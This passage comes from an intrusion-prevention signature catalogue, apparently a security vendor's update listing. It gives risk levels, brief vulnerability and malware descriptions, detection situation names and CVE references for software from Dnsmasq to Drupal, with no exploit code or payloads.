sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Simon Kelly Dnsmasq

Type:

Buffer Overflow

Description:

Dnsmasq has a heap based buffer overflow vulnerability due to improper bounds checking when handling TFTP read requests. A successful exploit leads to a denial of service condition or arbitrary code execution within the security context of the affected service.

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

References:

CVE-2009-2957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2957

BID-36121
http://www.securityfocus.com/bid/36121

OSVDB-57592
http://www.osvdb.org/57592

DoblePulsar-PeddleCheap-Implant-Traffic

About this vulnerability:	Malware C&C traffic
Risk:	Moderate
First detected in:	sgpkg-ips-1019-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Post Compromise Behaviour
Description:	Command and control traffic of the DoublePulsar DanderSpritz implant.
Situation:	Generic_SS-DoblePulsar-PeddleCheap-Implant-Traffic File-Binary_DoblePulsar-PeddleCheap-Implant-Traffic

Docker-Daemon-Unprotected-TCP-Socket-Exploit

About this vulnerability:	A Docker Daemon Unprotected TCP Socket Exploit vulnerability
Risk:	High
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Docker
Type:	Input Validation
Description:	A vulnerability in Docker which allows remote attackers to create a Docker container with the '/' path mounted with read/write permissions on the host server, via tcp sockets tcp/2375 and tcp/2376.
Situation:	HTTP_CRL-Docker-Daemon-Unprotected-TCP-Socket-Exploit

Docpile-Init-Path-Parameter-Remote-File-Inclusion

About this vulnerability:

A file inclusion vulnerability in docpile:we

Risk:

High

First detected in:

sgpkg-ips-160-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

docpile:we

Type:

PHP Injection

Description:

There is a file inclusion vulnerability in docpile:we, a web-based document management application. Multiple components of the application allow inclusion of arbitrary files, which may lead to an arbitrary code execution in the context of the web server.

Situation:

HTTP_CSU-Docpile-Init-Path-Parameter-Remote-File-Inclusion

References:

CVE-2006-4075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4075

BID-19428
http://www.securityfocus.com/bid/19428

OSVDB-27862
http://www.osvdb.org/27862

OSVDB-27859
http://www.osvdb.org/27859

OSVDB-27860
http://www.osvdb.org/27860

OSVDB-27861
http://www.osvdb.org/27861

Dogfood-CRM-Remote-Command-Execution

About this vulnerability:

A Dogfood CRM Remote Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dogfood CRM

Type:

Input Validation

Description:

A vulnerability in Dogfood CRM, version 2.0.10, that allows remote attackers to execute arbitrary commands in the spell check feature.

Situation:

HTTP_CRL-Dogfood-CRM-Remote-Command-Execution

References:

OSVDB-54707
http://www.osvdb.org/54707

Dolibarr-16-Pre-Auth-Contact-Database-Dump

About this vulnerability:	An attempt to exploit a vulnerability in Dolibarr detected
Risk:	High
First detected in:	sgpkg-ips-1625-5242
Last changed:	sgpkg-ips-1625-5242
Platform:	Generic
Software:	Dolibarr
Type:	Insecure Configuration
Description:	A vulnerability in Dolibarr, versions prior to 16.0.5, which allows unauthenticated remote attackers to retreive a company's customer and employee information by a contact dump via getContact using the % character in the email parameter.
Situation:	HTTP_CRL-Dolibarr-16-Pre-Auth-Contact-Database-Dump

Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1758-5242

Last changed:

sgpkg-ips-1758-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

Insufficient sanitization of the facid request parameter causes a cross-site scripting vulnerability in Dolibarr ERP and CRM. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting

References:

CVE-2024-34051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34051

Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

A command injection vulnerability has been reported for Dolibarr ERP/CRM. The vulnerability is due to insufficient user input validation in the functions dol_sanitizeFileName() and dol_sanitizePathName(). A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in command execution under the security context of the PHP interpreter.

Situation:

HTTP_CRL-Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection

References:

CVE-2023-38886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38886

Dolibarr-ERP-And-CRM-Edit.php-Code-Injection

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

A code injection vulnerability has been reported in Dolibarr ERP and CRM. The vulnerability is due to insufficient sanitization of parameters. A remote attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in remote code execution on the target server.

Situation:

HTTP_CRL-Dolibarr-ERP-And-CRM-Edit.php-Code-Injection

References:

CVE-2022-40871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40871

Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

Improper input validation on user-provided data in the dol_Eval fucntion of the Menu editor module of Dolibarr causes a code injection vulnerability which allows a remote attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection

References:

CVE-2022-0819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0819

Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1412-5242

Last changed:

sgpkg-ips-1498-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

There exists a command injection vulnerability in Dolibarr ERP/CRM. Successful exploitation could lead in arbitrary command injection on the target server.

Situation:

HTTP_CS-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection

References:

CVE-2021-33816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33816

Dolibarr-ERP-CRM-Command-Injection

About this vulnerability:

A Dolibarr ERP CRM Command Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Dolibarr

Type:

Input Validation

Description:

A vulnerability in Dolibarr ERP & CRM, versions 3.2.0 and before, which allows remote attackers to execute arbitrary system commands through the sql_compat parameter due to lack of proper input validation.

Situation:

HTTP_CRL-Dolibarr-ERP-CRM-Command-Injection

References:

OSVDB-80980
http://www.osvdb.org/80980

Dolibarr-ERP-CRM-SQL-Injection

About this vulnerability:

A vulnerability in Dolibarr

Risk:

High

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dolibarr

Type:

SQL Injection

Description:

A vulnerability in Dolibarr which allows remote attackers to obtain usernames and encrypted passwords using an SQL injection.

Situation:

HTTP_CSU-Dolibarr-ERP-CRM-SQL-Injection

References:

CVE-2018-10094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10094

Dolibarr-ERP-Group-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Dolibarr ERP and CRM Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1412-5242

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

Dolibarr

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data during group creation in the group module of Dolibarr ERP and CRM Suite causes a cross-site scripting vulnerability that allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Dolibarr-ERP-Group-Stored-Cross-Site-Scripting

References:

CVE-2021-33618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33618

Donbot-Bot

About this vulnerability:	Donbot Bot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Donbot is a Botnet that is used to send e-mail spam.
Situation:	HTTP_CRL-Donbot-Bot-Activity-Detected

Donbot-Spambot

About this vulnerability:	Donbot spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Donbot spambot
Type:	Backdoor
Description:	Donbot spambot is a template-based spamming engine.
Situation:	Generic_CS-Donbot-Spambot

Dopewars-Denial-of-Service

About this vulnerability:

A Dopewars Denial of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dopewars

Type:

Input Validation

Description:

A vulnerability in Dopewars version 1.5.12 which allows remote attackers to cause a denial of service condition by sending a REQUESTJET message with an invalid location.

Situation:

Generic_CS-Dopewars-Denial-of-Service

References:

CVE-2009-3591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3591

BID-36606
http://www.securityfocus.com/bid/36606

OSVDB-58884
http://www.osvdb.org/58884

Dorkbot-Botnet

About this vulnerability:	Dorkbot botnet
Risk:	High
First detected in:	sgpkg-ips-571-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Dorkbot is an IRC-based malicious botnet. Dorkbot is a malware dropper and has been observed to download malicious executables that steal login information. However, Dorkbot may download any arbitrary malicious executable at any time and imposes a high security risk.
Situation:	Generic_CS-Dorkbot-Traffic

Dotcms-Cmsfilter-Assets-Access-Control-Weakness

About this vulnerability:

A vulnerability in dotCMS dotCMS

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

dotCMS

Type:

Malfunction

Description:

Insufficient path validation in the CMSFilter class causes an access control vulnerability in dotCMS. A successful exploit allows an attacker to bypass access restrictions and possibly execute code on the target system.

Situation:

HTTP_CSU-Dotcms-Cmsfilter-Assets-Access-Control-Weakness

References:

CVE-2020-6754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6754

Dotcms-RCE-Via-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in dotCMS.

Risk:

High

First detected in:

sgpkg-ips-1477-5242

Last changed:

sgpkg-ips-1477-5242

Platform:

Windows; Linux

Software:

dotCMS

Type:

Input Validation

Description:

A vulnerability in dotCMS which allows remote attackers to execute arbitrary code byt sending a crafted POST request to /api/content/, due to the lack of filename validation.

Situation:

HTTP_CS-Dotcms-RCE-Via-Arbitrary-File-Upload

References:

CVE-2022-26352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352

DotNetNuke-Cookie-Deserialization-RCE

About this vulnerability:

A vulnerability in DotNetNuke.

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Windows

Software:

DotNetNuke

Type:

Input Validation

Description:

A vulnerability in DotNetNuke, versions 5.0.0 to 9.3.0-RC, which allows remote attackers to execute arbitrary code throught the "type" attribute within the Cookie header.

Situation:

HTTP_CSH-DotNetNuke-Cookie-Deserialization-RCE

References:

CVE-2017-9822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9822

Double-Encoding-Usage-In-URI

About this vulnerability:	Double encoding attack technique detected
Risk:	High
First detected in:	sgpkg-ips-1646-5242
Last changed:	sgpkg-ips-1646-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	This fingerprint detects the usage of double encoding attack technique (e.g., "%2561"). It could be used to bypass security filters that only decode user input once. The second decoding process is executed by the backend platform or modules that properly handle encoded data, but do not have the corresponding security checks in place.
Situation:	HTTP_CSU-Double-Encoding-Usage

DoublePulsar-Backdoor

About this vulnerability:	DoublePulsar Backdoor
Risk:	High
First detected in:	sgpkg-ips-911-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	DoublePulsar is a backdoor originally developed by NSA and leaked by The Shadow Brokers.
Situation:	SMB-TCP_CS-Trans2-DoublePulsar-Request SMB-TCP_SS-Trans2-DoublePulsar-Response

Dovecot-And-Pigeonhole-Remote-Code-Execution

About this vulnerability:

A vulnerability in Dovecot

Risk:

Moderate

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dovecot

Type:

Malfunction

Description:

Improper handling of NUL bytes in quoted strings causes a remote code execution vulnerability in Dovecot and Pigeonhole IMAP and ManageSieve protocol parsers. A successful exploit may allow an attacker to run arbitrary code on the target.

Situation:

IMAP_CS-Dovecot-And-Pigeonhole-Remote-Code-Execution

References:

CVE-2019-11500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11500

Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Dovecot Dovecot

Risk:

Moderate

First detected in:

sgpkg-ips-1055-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dovecot

Type:

Malfunction

Description:

Improper parsing of SMTP causes an out-of-bounds read vulnerability in Dovecot. A successful exploit may lead to information disclosure or a denial of service condition.

Situation:

SMTP_CS-Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read

References:

CVE-2017-14461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14461

Dovecot-SASL-Authentication-Component-Denial-Of-Service

About this vulnerability:

A vulnerability in Dovecot Dovecot

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dovecot

Type:

Malfunction

Description:

The SASL authentication component of Dovecot has a vulnerability which can be exploited to cause a denial of service condition.

Situation:

SMTP_Dovecot-SASL-Authentication-Component-Denial-Of-Service
IMAP_Dovecot-SASL-Authentication-Component-Denial-Of-Service
POP3_Dovecot-SASL-Authentication-Component-Denial-Of-Service

References:

CVE-2016-8652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8652

Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS

About this vulnerability:

A vulnerability in Dovecot

Risk:

High

First detected in:

sgpkg-ips-1249-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dovecot

Type:

Infinite Loop

Description:

There exists a vulnerability in the Dovecot server, versions 2.3.9 and before, which allows remote attackers to cause a denial of service condition by sending a malicious request, due to infinite loop in the submission-login and lmtp components when processing truncated command parameters.

Situation:

SMTP_CS-Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS

References:

CVE-2020-7046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7046

Dovecot-Submission-Login-Service-Auth-DoS

About this vulnerability:

A vulnerability in Dovecot Submission-Login Service

Risk:

High

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dovecot

Type:

Malfunction

Description:

A vulnerability in Dovecot which allows remote attackers to cause the Dovecot submission-login process to abnormally terminate by repeatedly sending malicious requests to the target server.

Situation:

SMTP_CS-Dovecot-Submission-Login-Service-Auth-DoS

References:

CVE-2019-11499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11499

Downandup-Worm-Request

About this vulnerability:	Request generated by W32/Downadnup worm
Risk:	High
First detected in:	sgpkg-ips-200-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	The W32/Downandup worm that automatically exploits systems and reports its status to a set of generated domains after it has infected a host. Presence of these requests indicate that there are infected systems in the network.
Situation:	HTTP_CS-Conficker-Worm-Request MSRPC-TCP_CPS-Conficker-Worm-ShellCode

Downloader-Malware

About this vulnerability:	Downloader malware
Risk:	High
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	Downloader malware is a post exploitation tool that is used to download additional components such as backdoors to a compromised system.
Situation:	HTTP_SS-Downloader-Malware File-Text_Downloader-Malware

Downloader-Malware-Infection-Traffic

About this vulnerability:	Downloader malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1310-5242
Last changed:	sgpkg-ips-1310-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Downloader malware infection traffic (similar to OSTAP) was detected.
Situation:	HTTP_CRL-Downloader-Malware-Infection-Traffic

DrayTek-Vigor-Command-Execution-CVE-2020-15415

About this vulnerability:

A vulnerability in DrayTek Vigor

Risk:

High

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1786-5242

Platform:

Generic

Software:

DrayTek Vigor

Type:

Input Validation

Description:

A pre-authenticated command injection vulnerability has been reported in the DrayTek Vigor3900, Vigor2960, and Vigor300B firmware versions before 1.5.1.1.

Situation:

HTTP_CS-DrayTek-Vigor-Command-Execution-CVE-2020-15415

References:

CVE-2020-15415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15415

DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123

About this vulnerability:

A vulnerability in DrayTek VigorConnect

Risk:

High

First detected in:

sgpkg-ips-1780-5242

Last changed:

sgpkg-ips-1780-5242

Platform:

Linux; Windows

Software:

DrayTek Vigor

Type:

Directory Traversal

Description:

A local file inclusion vulnerability exists in the DownloadFileServlet component of DrayTek VigorConnect 1.6.0-B3. Successfully exploiting this vulnerability allows an unauthenticated attacker to download arbitrary system files, leading into the disclosure of sensitive information such as passwords.

Situation:

HTTP_CSU-DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123

References:

CVE-2021-20123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20123

DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20124

About this vulnerability:

A vulnerability in DrayTek Vigor

Risk:

High

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1831-5242

Platform:

Generic

Software:

DrayTek Vigor

Type:

Directory Traversal

Description:

A local file inclusion vulnerability exists in the WebServlet component of DrayTek VigorConnect 1.6.0-B3. Successfully exploiting this vulnerability allows an unauthenticated attacker to download arbitrary system files, leading into the disclosure of sensitive information such as passwords.

Situation:

HTTP_CRL-DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection

References:

CVE-2021-20124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20124

DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection

About this vulnerability:

A vulnerability in DrayTek Vigor

Risk:

High

First detected in:

sgpkg-ips-1292-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DrayTek Vigor

Type:

Input Validation

Description:

A vulnerability in DrayTek Vigor2960, Vigor3900, and Vigor300B, which allows remote attackers to execute arbitrary code due to insufficient user input validation of the keyPath parameter.

Situation:

References:

CVE-2020-8515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8515

Dreamloader-Bot

About this vulnerability:	Dreamloader Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Dreamloader is a bot that opens a backdoor on the infected machine for a remote attacker to use.
Situation:	HTTP_CS-Dreamloader-Bot-Traffic HTTP_CSH-Dreamloader-Bot-Traffic

Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

An information disclosure vulnerability has been discovered in Drupal Core. The vulnerability is due to an input validation error when handles a malicious OpenID response. It can be exploited by a remote attacker to read files on the local filesystem by using a malicious OpenID server.

Situation:

File-TextId_Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure

References:

CVE-2012-4554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4554

BID-56103
http://www.securityfocus.com/bid/56103

OSVDB-86429
http://www.osvdb.org/86429

Dropbox-Lan-Sync-Discovery-Protocol-Usage

About this vulnerability:	Dropbox Lan Sync discovery protocol message detected
Risk:	Moderate
First detected in:	sgpkg-ips-395-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Dropbox
Type:	Peer-to-Peer
Description:	Dropbox LAN sync discovery protocol messages detected. This protocol is used to distribute peer contact information for Dropbox hosts.
Situation:	P2P-UDP_Dropbox-Lan-Sync-Discovery-Protocol-Usage

Drovorub-Malware

About this vulnerability:	Drovorub Malware
Risk:	High
First detected in:	sgpkg-ips-1271-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Remote Control
Description:	Drovorub is a Linux malware toolset. When the Drovorub client has been implanted on the target machine, a remote attacker can use the client to download and upload files, execute code as root, and forward traffic to other hosts on the network.
Situation:	WebSocket_CS-Drovorub-Malware-C2-Communication WebSocket_SS-Drovorub-Malware-C2-Communication

Drupal-Coder-Module-Coder_upgrade.run.php-Remote-Code-Execution

About this vulnerability:	A vulnerability in Drupal Coder
Risk:	Moderate
First detected in:	sgpkg-ips-784-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Drupal
Type:	Input Validation
Description:	Improper validation of client data causes a vulnerability which can be exploited to gain the ability to run arbitrary code on the target system.
Situation:	HTTP_CSU-Drupal-Coder-Module-Coder_upgrade.run-Remote-Code-Execution

Drupal-Core-Database-Expandarguments-SQL-Injection

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

SQL Injection

Description:

A SQL injection vulnerability has been found in Drupal Core. The vulnerability is due to insufficient validation of user-supplied data when expanding argument values used in SQL queries. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted parameter to a Drupal Core server. Successful exploitation could lead to arbitrary code execution under the security context of the server.

Situation:

HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-3
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-2

References:

CVE-2014-3704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704

BID-70595
http://www.securityfocus.com/bid/70595

OSVDB-113371
http://www.osvdb.org/113371

Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Drupal Core

Risk:

Moderate

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

Improper handling of file names of file uploads causes a cross-site scripting vulnerability in Drupal. A successful exploit may allow an attacker to run arbitrary scripts in the browser of a user using the affected Drupal instance.

Situation:

HTTP_CS-Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting

References:

CVE-2019-6341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6341

Drupal-Core-Form-Rendering-Remote-Code-Execution

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

Improper validation of HTTP request data causes a remote code execution vulnerability in Drupal. A successful exploit allows an attacker to execute arbitrary code with the privileges of the server process.

Situation:

HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution
HTTP_CRL-Drupalgeddon2-Post-Parameter

References:

CVE-2018-7600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600

Drupal-Core-Form-Rendering-Remote-Code-Execution-2

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

Improper validation of user-supplied data causes a remote code execution vulnerability in Drupal. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution-2

References:

CVE-2018-7602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7602

Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization

About this vulnerability:

A vulnerability in Drupal Core

Risk:

Moderate

First detected in:

sgpkg-ips-1147-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Drupal Core. This vulnerability can be remotely exploited. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization

References:

CVE-2019-6339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6339

Drupal-Core-Remote-Code-Execution-CVE-2019-6340

About this vulnerability:

A vulnerability in Drupal

Risk:

High

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in Drupal's core. Successful exploitation could lead in remote code execution on the target server.

Situation:

HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340

References:

CVE-2019-6340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340

Drupal-Core-System.Temporary-Information-Disclosure

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Malfunction

Description:

Insufficient access control in Drupal allows an attacker to download the full configuration from the system. The vulnerability is dependent on the user account settings, making legitimate downloads of the configuration data indistinguishable from malicious downloads. This detects all such downloads.

Situation:

HTTP_CRL-Drupal-Core-System.Temporary-Information-Disclosure

References:

CVE-2016-7572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7572

Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340

About this vulnerability:

A vulnerability in Drupal Core

Risk:

High

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

A vulnerability in Drupal Core, versions 7.x, 8.5.x prior to 8.5.11, and 8.6.x prior to 8.6.10, which allows remote attackers to execute arbitrary code due to the insufficient sanitization of the data for certain Field Types from non-form sources prior to deserialization.

Situation:

HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340

References:

CVE-2019-6340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340

Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

Moderate

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Drupal Core. The vulnerability is due to an input validation error when an XML-RPC endpoint xmlrpc.php handles Internal Entity Expansion. This can cause a very high CPU load and memory exhaustion. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service on the vulnerable system.

Situation:

HTTP_CS-Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service

References:

CVE-2014-5265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5265

OSVDB-109867
http://www.osvdb.org/109867

Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service

About this vulnerability:

A vulnerability in Drupal Drupal

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drupal

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Drupal Core. The vulnerability is due to an input validation error when XML-RPC endpoint xmlrpc.php handles an unreasonably large number of tags, which can cause a very high CPU load and memory exhaustion. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service on the vulnerable system.

Situation:

File-TextId_Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service

References:

CVE-2014-5266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5266

OSVDB-109867
http://www.osvdb.org/109867

Drupal-Drupalgeddon-2-Forms-API-Property-Injection

About this vulnerability:

A Drupal Drupalgeddon 2 Forms API Property Injection

Risk:

High

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Drupal

Type:

Input Validation

Description:

A vulnerability in Drupal, versions 7.x and 8.x, which allows remote attackers to execute arbitrary code through multiple subsystems.

Situation:

HTTP_CRL-Drupal-Drupalgeddon-2-Forms-API-Property-Injection

References:

CVE-2018-7600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600

Drupal-Restws-Module-Page-Callback-Remote-Code-Execution

About this vulnerability:	A vulnerability in Drupal
Risk:	Moderate
First detected in:	sgpkg-ips-780-5211
